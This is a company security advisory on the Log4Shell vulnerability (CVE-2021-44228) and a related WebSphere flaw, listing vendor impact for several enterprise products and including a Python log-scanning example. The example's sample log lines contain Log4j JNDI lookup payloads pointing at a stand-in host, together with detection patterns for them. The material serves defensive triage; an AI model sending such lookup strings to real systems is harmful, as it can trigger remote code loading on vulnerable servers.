Important security alert

Clarita’s response to the Apache Log4j 2 security vulnerability (CVE-2021-44228)

In Insight by Tara Annesley

At a glance

  • A high severity vulnerability was identified in Apache Log4j on 9 December.
  • This vulnerability impacts all organisations running internet-facing applications and the widely used Java-based Log4j 2 library.
  • Clarita's Managed Service Support team is currently assessing the impact for Clarita clients and will provide updates as the situation progresses with advice and suggested actions.

Updated 21 December 2021

IBM has advised of a second high-priority vulnerability relating to WebSphere.

CVEID: CVE-2021-4104
CVSS Base score: 8.1

Description: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system.

Additional Details: Clarita does not believe any of our clients currently use JMSAppender in any supported applications. However, IBM's recommended solution is to apply an interim fix, which is available at: Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046).

If you are a Clarita EAMaaS customer, we will be applying this fix to your environments over the coming days.

If you are not a Clarita EAMaaS customer, and would like assistance to apply this latest fix, please contact Support.


A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 utility was disclosed publicly on December 9, 2021. The severe vulnerability in the Java logging libraries allows unauthenticated remote code execution and access to servers.

The Apache Log4j 2 vulnerability (known as Log4Shell) has a huge impact, since most web servers are equipped with Apache software.

It affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1. Log4j 2 is a Java-based logging library that is widely used in business system development, included in various open-source libraries, and directly embedded in major software applications. Because this vulnerability is in a Java library, the cross-platform nature of Java means the vulnerability is exploitable on many platforms, including both Windows and Linux.

Applications directly accessible on the internet - such as internet-facing mobile applications - are therefore at great risk.

A cybercriminal can only exploit this vulnerability when they have access to the application. The vulnerability is a remote code execution vulnerability that can allow an unauthenticated attacker to gain complete access to a target system. It is triggered when a specially crafted string is parsed and processed by the vulnerable Log4j 2 component, which can happen through any user-provided input that the application logs.
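Because the trigger is a crafted lookup string arriving in logged, user-supplied fields, one practical first step for a defender is to sweep web access logs for it. The following Python example is added here and is not Clarita's tooling; the log lines are constructed samples, and the two patterns (the direct lookup prefix and a lookup nested inside another lookup) are assumptions about what is worth triage, not a complete signature set.

```python
import re

# Constructed sample access-log lines (not real traffic): a benign request,
# one carrying a lookup string in the User-Agent header, one in the query string.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [10/Dec/2021:08:01:12 +1100] "GET /maximo/ui/login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:08:02:40 +1100] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.12 - - [10/Dec/2021:08:03:05 +1100] "GET /?q=${JNDI:rmi://example.invalid/b} HTTP/1.1" 404 312 "-" "curl/7.68.0"',
]

# Direct lookup prefix, case-insensitive: Log4j 2 expands "${...}" lookups in logged
# messages, so any request field containing this deserves triage.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A "${" nested inside another "${...}" is rarely legitimate in a request field,
# so flag it too (assumed heuristic) rather than relying on the literal prefix only.
NESTED_PATTERN = re.compile(r"\$\{[^}]*\$\{")


def classify_line(line: str) -> str:
    """Return 'jndi', 'nested' or 'clean' for one access-log line."""
    if JNDI_PATTERN.search(line):
        return "jndi"
    if NESTED_PATTERN.search(line):
        return "nested"
    return "clean"


def scan_log(lines):
    """Return (line_number, verdict, line) for every line that needs triage."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify_line(line)
        if verdict != "clean":
            hits.append((number, verdict, line))
    return hits


if __name__ == "__main__":
    for number, verdict, line in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {verdict}: {line}")
```

A hit only shows that a lookup string was received, not that it was logged by a vulnerable Log4j 2 version; confirm the library version on the host before treating it as an incident.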

Clarita is currently working through our application portfolio in order to conduct impact assessments. We are closely monitoring various vendor announcements to understand how and when this vulnerability can be addressed.

We will keep you updated on the impact of the vulnerability and actions required to mitigate your risk as our evaluation progresses.

Read more from the Australian Cyber Security Centre here.

Vendor Updates

Clarita will continue to monitor announcements and advice from the following product vendors and will update the below information as it comes to hand.

Columns: Application / Configuration Item; Product Vendor; Impact Assessment / Status; References.

Maximo
  Vendor: IBM
  Status: Under review
  Reference: An update on the Apache Log4j CVE-2021-44228 vulnerability - IBM PSIRT Blog

EZMaxMobile
  Vendor: Interpro
  Status: Impact to v6.1.0 to 6.1.2
  Reference: Clarita will perform the required actions for our Managed Service Support clients.

ArcGIS
  Vendor: Esri
  Status: Impact to v10.8 and lower
  Reference: Urgent ArcGIS Software Security Alert – CVE-2021-44228 (aka Log4Shell aka LogJam) | Esri Australia Technical Blog (wordpress.com)

Geocortex products
  Vendor: Geocortex
  Status: No impact
  Reference: The version of log4j that is included with Geocortex Essentials and Geocortex Analytics is not vulnerable.

WebSphere
  Vendor: IBM
  Status: Impact to v9.0 and 8.5
  Reference: Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)

webMethods
  Vendor: Software AG
  Status: Impact to v10.5 and greater
  Reference: https://tech.forums.softwareag.com/t/log4j-zero-day-vulnerability/253849

Need immediate assistance?

Existing clients can log tickets through the Service Desk via phone, email or online portal.